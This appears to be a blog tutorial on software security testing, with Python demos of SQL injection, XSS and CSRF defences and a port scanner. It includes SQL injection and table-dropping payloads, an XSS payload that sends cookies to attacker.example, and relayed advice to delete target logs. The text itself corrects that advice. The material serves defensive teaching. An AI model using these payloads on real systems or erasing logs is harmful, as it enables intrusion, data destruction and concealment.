One or two bugs in "software testing" are small things, but security vulnerabilities are big things. We must pay attention to them
2022-06-30 18:08:00 【Lovely and loving programmers】
We have already covered black-box and white-box testing and performance testing, but for a piece of software, security testing matters just as much. As the cover image suggests, attractive content is an easy lure: once a user clicks through, it is easy to make them perform operations they never intended, and the consequences can be severe. Doing software security testing well is therefore essential to building a sound software environment.
The following article explains security testing within software testing. Let's study it together.
I. Security testing concepts
1. Overview of security testing
Security testing is the process, within the life cycle of an IT software product and especially in the stage between substantially finished development and release, of inspecting the product to verify that it meets the defined security requirements and product quality standards.
2. The relationship between security testing and the software life cycle
Security testing runs through the whole software life cycle. (The original article illustrates this with a figure that is not reproduced here.)

3. Differences between ordinary testing and security testing
(1) Different goals
Ordinary testing aims to find bugs;
security testing aims to find hidden dangers, that is, security weaknesses.

(2) Different assumptions
Ordinary testing assumes that problematic data comes from user carelessness, and as a rule considers only the user interface;
security testing assumes that problematic data is deliberately constructed by an attacker, so every possible attack path must be considered.

(3) Different scope of thinking
Ordinary testing thinks in terms of the system's functions;
security testing considers not only the system's functions but also the system's mechanisms, its external environment, application and data security risks, and security properties.

(4) Different criteria for recognising a problem
Ordinary testing judges a problem as a violation of the functional definition;
security testing judges a problem as a violation of authorisation and capability constraints.

II. Basic principles of security testing
1. Cultivate the right way of thinking
Security testers need creative thinking. It lets us stand in the attacker's position and think through all kinds of unexpected situations, and at the same time helps us guess how the developers built the program, how its protection logic might be bypassed, and which unsafe behaviour patterns could make the program fail.

2. Test early and often
Security flaws are no different from ordinary bugs: the earlier they are found, the cheaper they are to fix. To make that possible, the first step is to train the development and test teams on common security issues early in the development of the software and teach them how to detect and fix security defects.
Although newer third-party libraries, tools and programming languages can help developers design safer programs, new threats keep emerging. Developers should stay aware of how newly disclosed vulnerabilities affect the software under development, and testers should change their way of thinking and examine every detail of the application from the attacker's point of view, so that the software becomes more secure.

3. Choose the right test tools
Security testing often has to simulate an attacker's behaviour against the software system in order to confirm that the system can defend itself. Simulating attacks requires security testers to be proficient with a range of tools, such as vulnerability scanners, tools that simulate data flow between front end and back end, and packet-capture tools.
Many security scanners and application firewall products on the market can automate a large share of routine security tasks, but none of them is all-powerful. As testers we must know exactly what each tool can and cannot do; never overstate or misuse a test tool.

4. Test the source code wherever possible
Scanning the software with a source-code scanning tool tests it from the inside: it identifies potential risks and raises the security of the code, and it also improves code quality in general. Combining black-box penetration testing from the outside with white-box source-code scanning from the inside greatly improves the software's security.

5. Document the test results
At the end of a test, record the test actions and results clearly and accurately in a file and produce a test report. The report should include the vulnerability type, the security threat the problem poses and its severity, the testing technique that found it, how the vulnerability can be fixed, and the residual risk.
A good test report helps developers locate the security vulnerability precisely, so that it can be fixed effectively and the software becomes more secure and reliable.

III. Common security vulnerabilities
1. SQL injection
(1) Definition
SQL injection means inserting SQL commands into a URL, a form field, or another input parameter of a dynamically generated SQL query, so that the server is tricked into executing malicious SQL.
(2) Case studies
Case 1: the login query is assembled by string concatenation:

```
str SQL = "select * from users where (name='" + username + "') and (pw='" + password + "');"
```

If the attacker submits `1' or '1'='1` as both the username and the password, the query becomes:

```
select * from users where (name='1' or '1'='1') and (pw='1' or '1'='1');
```

Each parenthesised condition is now always true, so the query returns every user and the login check passes without a valid password.

Case 2: stacked queries. With the same concatenation, a username of `Zhang San');DROP TABLE users;--` closes the original condition and appends a second statement (the `--` comments out the rest of the original line):

```
select * from users where (name='Zhang San');DROP TABLE users;--')
```

The database executes this as two statements:

```
select * from users where (name='Zhang San');
DROP TABLE users;
```

This only works where the driver executes several statements in one call; where it does not, the table survives, but the attacker still controls the WHERE clause.
(3) How to prevent SQL injection
SQL injection is a very high-risk vulnerability. In the application, validate user input for legitimacy, including the type and length of the data, and filter characters that have special meaning in SQL (single quotes, double quotes, semicolons, and so on). The control that actually removes the problem is to keep data out of the statement text altogether with parameterised (prepared) queries; filtering quotes on its own is brittle, since a numeric parameter needs no quote at all.
Because SQL injection attacks the web application at the application layer, most network firewalls will not intercept it. Beyond hardening the application code, defend on the database server as well: set permissions on the database server so that the web application's account has only the access it needs, revoke unnecessary public privileges, use strong encryption to protect sensitive data, and audit and track reads of sensitive data.
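The two cases and the prevention advice above, as an added, runnable example that is not part of the original article: it builds a throw-away in-memory SQLite database (constructed data), runs the concatenated login query beside a parameterised one, and shows the stacked DROP TABLE from case 2 succeeding when the driver call executes several statements at once. The table, the user `alice` and the attacker strings are assumptions chosen to match the article's queries.

```python
import sqlite3


def make_db():
    # Constructed in-memory users table for the demonstration (assumption, not
    # from the article); the column names follow the article's query.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    # The article's concatenated query: attacker input becomes SQL text, so a
    # quote followed by OR rewrites the WHERE clause.
    sql = ("select * from users where (name='" + username + "') "
           "and (pw='" + password + "');")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    # Parameterised query: values travel separately from the statement text,
    # so "1' or '1'='1" is compared literally as a name and matches nothing.
    sql = "select * from users where (name=?) and (pw=?)"
    return conn.execute(sql, (username, password)).fetchone() is not None


def lookup_vulnerable_stacked(conn, username):
    # Case 2 from the article: a driver call that accepts several statements
    # (sqlite3's executescript here) lets the attacker append DROP TABLE.
    sql = "select * from users where (name='" + username + "')"
    conn.executescript(sql)


def users_table_exists(conn):
    row = conn.execute(
        "select name from sqlite_master where type='table' and name='users'"
    ).fetchone()
    return row is not None


def run_demo():
    conn = make_db()
    payload = "1' or '1'='1"
    results = {
        "legit_vulnerable": login_vulnerable(conn, "alice", "s3cret"),
        "legit_safe": login_safe(conn, "alice", "s3cret"),
        "inject_vulnerable": login_vulnerable(conn, payload, payload),
        "inject_safe": login_safe(conn, payload, payload),
    }
    # Stacked-query payload from case 2; the trailing --') comments out the
    # remainder of the original statement.
    lookup_vulnerable_stacked(conn, "Zhang San');DROP TABLE users;--")
    results["table_dropped"] = not users_table_exists(conn)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The legitimate login succeeds in both variants; the `1' or '1'='1` payload logs in through the concatenated query and is rejected by the parameterised one, and the stacked payload removes the table only through the call that executes several statements. Type and length checks remain useful as defence in depth, but the parameter placeholder is what stops attacker data from changing the query's structure.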
2. XSS (cross-site scripting)
(1) The name XSS
XSS stands for Cross Site Scripting. Its abbreviation was originally CSS, but that collides with the abbreviation of HTML Cascading Style Sheets, so cross-site scripting was renamed XSS to tell the two apart.
(2) Definition
XSS (Cross Site Scripting) is one of the most common security vulnerabilities in web applications. It arises mainly because the web application does not adequately check and filter user input, and writes that input back into a page without encoding it. An attacker uses an XSS vulnerability to inject malicious script into a website; when a user visits the website, the script runs in the user's browser and the attack succeeds.
(3) The XSS attack process
The original article illustrates the process with a figure (not reproduced here). It takes four steps:
- The attacker entices the user to click a link containing malicious code, by e-mail or another channel; for example, the attacker e-mails the user a link to the website home.com that carries the malicious code.
- After the user clicks the link, the browser executes the malicious code contained in it without the user's knowledge.
- The code sends the user's cookie, session and other data from the interaction with home.com to the attacker.
- With that data, the attacker impersonates the user to the real website and carries out illegal activities.
(4) How to defend
The core defence against XSS is to check and filter user input, including URLs, search keywords, HTTP headers and POST data: accept only content of the specified length range, appropriate format and expected kind, and reject everything else.
Beyond that, whenever untrusted data is inserted into an HTML tag or attribute, encode it for that context. Mark important cookies HttpOnly, so that JavaScript cannot read the cookie and an attacker's script cannot steal it through document.cookie.
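The defences above (input validation, output encoding and HttpOnly cookies), as an added example that is not from the original article. It reflects a search keyword into a constructed page template once verbatim and once HTML-encoded, applies an allow-list check to the keyword, and builds the Set-Cookie header for an HttpOnly session cookie. The template, the payload and the host name attacker.example are assumptions.

```python
import html
import re

# Constructed search-results template standing in for a real page (assumption,
# not from the article): the user's keyword is reflected into the HTML body.
TEMPLATE = "<html><body><p>Search results for: {q}</p></body></html>"

# Constructed payload: sends document.cookie to attacker.example, a placeholder
# host used only for this example.
PAYLOAD = ("<script>new Image().src='https://attacker.example/c?'"
           "+encodeURIComponent(document.cookie)</script>")


def render_vulnerable(keyword):
    # Reflects the parameter verbatim. Any markup in the URL becomes part of the
    # page and the victim's browser runs it with the site's cookies in scope.
    return TEMPLATE.format(q=keyword)


def render_safe(keyword):
    # Output encoding for HTML text/attribute context: < > & " ' become
    # entities, so the browser shows the payload as text instead of a tag.
    return TEMPLATE.format(q=html.escape(keyword, quote=True))


# Input validation as the article describes it: an allow-list of expected
# format and length (letters, digits, underscore, spaces, hyphens; 1-64 chars).
KEYWORD_RE = re.compile(r"[\w \-]{1,64}")


def keyword_is_valid(keyword):
    return KEYWORD_RE.fullmatch(keyword) is not None


def session_cookie_header(session_id):
    # HttpOnly keeps the cookie out of document.cookie, so an injected script
    # cannot read it; Secure and SameSite are the usual companions.
    return (f"Set-Cookie: session={session_id}; HttpOnly; Secure; "
            "SameSite=Lax; Path=/")


def page_executes_script(page):
    # Crude check used by the demo: an unescaped <script> tag would execute.
    return "<script>" in page


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("safe:      ", render_safe(PAYLOAD))
    print("valid?     ", keyword_is_valid(PAYLOAD))
    print(session_cookie_header("abc123"))
```

Encoding is context-specific: html.escape is right for HTML body text and quoted attribute values, but data placed inside a `<script>` block, a URL or a CSS value needs the encoding for that context instead. HttpOnly stops the script from reading the cookie; it does not stop the script from sending requests that the browser will attach the cookie to, so it limits cookie theft rather than ending the attack.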
3. CSRF (cross-site request forgery)
(1) Definition
CSRF (Cross-Site Request Forgery) is an attack on web applications in which the attacker exploits a CSRF vulnerability to disguise a forged request as a request from a trusted user and have the targeted website accept it.
(2) The attack process
The original article illustrates the CSRF attack process with a figure (not reproduced here).

(3) How the attack works
In a CSRF attack, the user visits a trusted website and, without logging out of that session, is enticed by the attacker into opening a malicious website. The malicious website returns attack code that makes the browser send a request to the trusted website; because the browser attaches the user's cookies automatically, the trusted website receives the attacker's request as though the user had sent it.
(4) The difference between CSRF and XSS
XSS steals the user's information and then impersonates the user to perform malicious actions; CSRF attacks the website through the user.
If XSS is compared to a thief stealing the user's ID card to transact illegal business, CSRF is a con artist "hijacking" the user and getting the user to transact the illegal business in person, achieving the attacker's goal.
(5) How to prevent CSRF
The root cause of CSRF is the lack of a stronger authentication mechanism for user requests, so the main idea in defending against it is to strengthen server-side verification of the user and of the request, rather than relying on the cookie alone.
For example: verify the source website through the Referer field of the HTTP request header; add token verification bound to the current user's identity; or require a verification code before data is submitted, so that the source of the request is confirmed and unauthorised malicious operations are prevented.
(6) Referer
HTTP Referer is a request header that carries the source of the request (the address of the previous page). When a browser sends a request to a web server it usually includes a Referer telling the server from which page the link was followed, and the server can use that information in its processing. Browsers, privacy settings and proxies sometimes strip the header, so a Referer check must decide deliberately what to do with a missing value and should back up the token check rather than replace it.
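The CSRF defences described in (5) and (6), as an added example that is not part of the original article: a token bound to the session with an HMAC, constant-time verification of the submitted token, and a Referer check against a trusted host. The host name home.example, the session ids and the request dictionaries are constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Server-side secret and the trusted host name are assumptions for this
# example; a real deployment would load the secret from configuration.
SERVER_SECRET = secrets.token_bytes(32)
TRUSTED_HOST = "home.example"


def issue_csrf_token(session_id):
    # The token is an HMAC over the session id: a malicious site cannot compute
    # it without SERVER_SECRET, and a token issued to one session fails for
    # any other session.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, submitted):
    if not isinstance(submitted, str):
        return False
    expected = issue_csrf_token(session_id).encode()
    # compare_digest runs in constant time, so an attacker cannot learn the
    # token byte by byte from response timing.
    return hmac.compare_digest(expected, submitted.encode())


def referer_ok(headers):
    # Referer check: the request must come from a page on the trusted host.
    # Compare the whole host name; a prefix check would accept
    # "home.example.attacker.example". A missing Referer is rejected here;
    # because browsers and proxies sometimes strip it, the token, not the
    # Referer, is the primary control.
    ref = headers.get("Referer")
    if not ref:
        return False
    return urlsplit(ref).hostname == TRUSTED_HOST


def handle_transfer(session_id, headers, form):
    # A state-changing action. The session cookie alone (session_id) is not
    # enough, because the victim's browser attaches it to forged requests too.
    if not referer_ok(headers):
        return "rejected: untrusted referer"
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return "rejected: missing or invalid CSRF token"
    return "ok: transfer executed"


if __name__ == "__main__":
    sid = "sess-42"
    token = issue_csrf_token(sid)
    # Constructed requests: a genuine form post, then a forged one from a
    # malicious page that carries the cookie but cannot supply the token.
    print(handle_transfer(sid, {"Referer": "https://home.example/account"},
                          {"csrf_token": token}))
    print(handle_transfer(sid, {"Referer": "https://evil.example/"}, {}))
```

The forged request fails twice over: its Referer names the attacker's host, and it has no token because the attacker's page cannot read the victim's session or compute the HMAC. The token is the check that holds up even when the Referer is absent.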
IV. Penetration testing
1. Definition of penetration testing
Penetration testing is a method of evaluating the security of a computer network system by simulating a hacker's attack. From the attacker's point of view it actively analyses any weakness, technical defect or vulnerability in the system and, within agreed conditions, actively exploits the security vulnerabilities it finds.
2. Characteristics of penetration testing
Penetration testing is a gradual, progressively deeper process.
Penetration testing chooses attack methods that do not affect the normal operation of the business system.
3. The main steps of the penetration test process
The original article shows the main steps in a figure (not reproduced here); they are described one by one in the next section.

4. The penetration testing process
(1) Clarify the objective
- Determine the test requirements.
- Determine the scope of penetration testing the customer requires.
- Determine the rules of the penetration test.
(2) Collect information
In the information collection stage, gather as much information as possible about the project's software. For a web application, for example, collect the scripting language, server type and database type, the framework the project uses and the open-source software it includes. Information gathering is very important for penetration testing: only with enough information about the target can vulnerabilities be detected effectively.
There are two ways to collect information:
Active collection: gather the information you want by directly visiting and scanning the website, among other methods. This yields more information, but the visitor's activity will be recorded by the target host.
Passive collection: learn about the target through third-party services, such as searching for relevant information on the Internet. This yields less, and less direct, information, but the target host does not see the tester's activity.
(3) Scan for vulnerabilities
At this stage, comprehensively analyse the information collected and scan the target program with scanning tools to find existing security vulnerabilities.
(4) Verify vulnerabilities
The vulnerability scanning phase yields a large number of findings about the target program, but these include false positives. Testers must take the actual situation into account and build a simulated test environment in which to verify the security vulnerabilities. Only confirmed vulnerabilities are used to execute attacks.
(5) Analyse the information
Verified vulnerabilities can be used to attack the target program, but different vulnerabilities have different attack mechanisms and need further analysis: the principle behind the vulnerability, the tools available, the target program's detection mechanisms, whether the attack can bypass the firewall, and so on. Draw up a detailed, well-considered attack plan; this ensures the test proceeds smoothly.
(6) Penetration attack
The penetration attack launches a real attack on the target program to achieve the goals of the test, such as obtaining user account passwords, intercepting data transmitted by the target program, or taking control of the target host. Penetration testing is generally a one-off exercise, and after the attack the tester cleans up; the original article describes this as deleting system logs and program logs to erase traces of entry. In an authorised engagement, clean-up should stay within what the rules of engagement allow: normally that means removing the artefacts the tester introduced (test accounts, uploaded files, implants), not destroying the target's own audit logs, which the client needs in order to judge how well the attack was detected.
(7) Organise the information
After the penetration attack is complete, organise the information obtained through the attack; it provides the evidence for the test report written afterwards.
(8) Write the test report
After the test, write a test report describing the project's security test objectives, the information collection methods, the vulnerability scanning tools used and the vulnerabilities found, the attack plan, the actual attack results and the problems encountered during the test. Beyond that, analyse the target program's vulnerabilities further and propose secure, effective remediation.
V. Common security testing tools
1. Web vulnerability scanning tool: AppScan
(1) Definition
AppScan is a web application security testing tool originally from IBM (now maintained by HCL). It uses black-box testing and can scan for common web application security vulnerabilities.
(2) The AppScan scanning process
AppScan scans in three phases: explore, test and scan.
In the explore phase, AppScan sends requests to the site's links, forms and so on, and uses the responses to detect potential security weaknesses in the target program and determine the scope of the security test.
In the test phase, AppScan attacks the potential vulnerabilities. It has a built-in library of test strategies, which generate the test inputs corresponding to each security-risk detection rule, and it uses those inputs to attack the suspected vulnerability.
In the scan phase, AppScan examines the target program's responses to the attacks, determines from them whether each detected vulnerability is real and, if so, assigns a risk level, giving developers a basis for fixing the defects.
2. Port scanning tool: Nmap
(1) Definition
Nmap is a network port scanner used to discover which ports are open on hosts on the network, determine which services run on those ports, and infer the host's operating system. It is one of the essential tools for network administrators assessing the security of a network.
(2) Nmap functions
Nmap's main functions are:
- Host discovery
- Port state scanning
- Service and version detection
- Operating system detection
- Firewall/IDS evasion and spoofing
- Scripted interaction with targets (the Nmap Scripting Engine)
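An added example, not from the original article or the Nmap project, of what a port-state scan and banner-based service detection do underneath a tool like Nmap (and of step (3), vulnerability scanning, in the penetration test process above): a TCP connect scan against a constructed local service that answers with an SSH-style banner. The banner text, the loopback target and the scanned port window are assumptions.

```python
import socket
import threading


def start_banner_service(banner=b"SSH-2.0-DemoServer_1.0\r\n"):
    # Constructed stand-in for a target service (assumption, not from the
    # article): listens on an ephemeral loopback port and greets each client
    # with a banner, as many real services (SSH, SMTP, FTP) do.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:       # listener closed: stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def probe_port(host, port, timeout=0.5):
    # TCP connect scan: a completed three-way handshake means the port is
    # open. Then read whatever the service volunteers (banner grab), the
    # simplest form of service/version detection. Returns None if closed.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except OSError:               # refused, timed out or unreachable
        s.close()
        return None
    try:
        banner = s.recv(256)
    except OSError:               # open but silent: report an empty banner
        banner = b""
    finally:
        s.close()
    return banner.decode("ascii", errors="replace").strip()


def scan_ports(host, ports, timeout=0.5):
    # Returns {port: banner} for every open port in the iterable.
    found = {}
    for port in ports:
        banner = probe_port(host, port, timeout)
        if banner is not None:
            found[port] = banner
    return found


def run_demo():
    # Start the fake service, scan a small window of ports around it, then
    # shut it down. Only the listener's port is expected to answer.
    srv, open_port = start_banner_service()
    try:
        found = scan_ports("127.0.0.1", range(open_port - 2, open_port + 3))
    finally:
        srv.close()
    return open_port, found


if __name__ == "__main__":
    port, found = run_demo()
    for p, b in sorted(found.items()):
        print(f"{p}/tcp open  banner={b!r}")
```

A connect scan completes the handshake and so is visible in the target's logs, which is the "active collection" trade-off described in the information-gathering step; Nmap's SYN scan, OS fingerprinting and the Nmap Scripting Engine build on the same open/closed observation with far more probes and signatures than this sketch.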
3. Packet capture tool: Fiddler
(1) Definition
Fiddler is an HTTP debugging proxy. It sits as a proxy between the client and the web server and records all HTTP (and HTTPS) traffic passing between the computer and the Internet.
(The original article's figure of this arrangement is not reproduced here.)

(2) Fiddler functions
Fiddler captures all traffic from locally running programs and can therefore record server-to-server and device-to-server traffic. It also supports a variety of filters that pick out just the traffic the user is interested in, saving a lot of time and effort. Compared with other packet capture tools, Fiddler is small, easy to use and well featured, and it can archive captured traffic for later analysis.
4. Penetration testing tool: Metasploit
(1) Definition
Metasploit is a penetration testing platform that can find and verify vulnerabilities and exploit them to carry out penetration attacks. It is an open-source project that provides the infrastructure, content and tools for performing penetration tests and extensive security audits.
(2) Metasploit modules
For penetration attacks, Metasploit mainly provides the following module types:
Exploit modules (exploit): when run, attack the target by exploiting one of its security vulnerabilities.
Payload modules (payload): code that runs on the target computer after a successful exploit; it gives the user the access and privileges they need on the target system.
Auxiliary modules (auxiliary): a series of supporting modules, including scanners, vulnerability discovery modules and network protocol spoofing modules.
Encoder modules (encoder): typically used to obfuscate the attack module's code so that it evades the target's security protections, such as anti-virus software and firewalls.
Meterpreter: an in-memory attack payload that can be injected into a process and perform a wide range of actions on the target.
(3) The role of Metasploit
Metasploit is a multi-user collaboration tool: team members can share host data, view collected evidence and create host notes to share knowledge about specific targets. Ultimately, Metasploit helps users identify the weakest points of the target and prove the existence of vulnerabilities or security problems.
VI. Conclusion
For software testing, beyond black-box and white-box testing and performance testing, security testing is particularly important. Once a web page has a vulnerability, an attacker can easily make the victim perform unintended operations, a scenario nobody wants to see. Therefore, do security testing well for your software.
That's all about security testing! If anything is unclear or the article is wrong, please leave a message in the comments or send me a private message!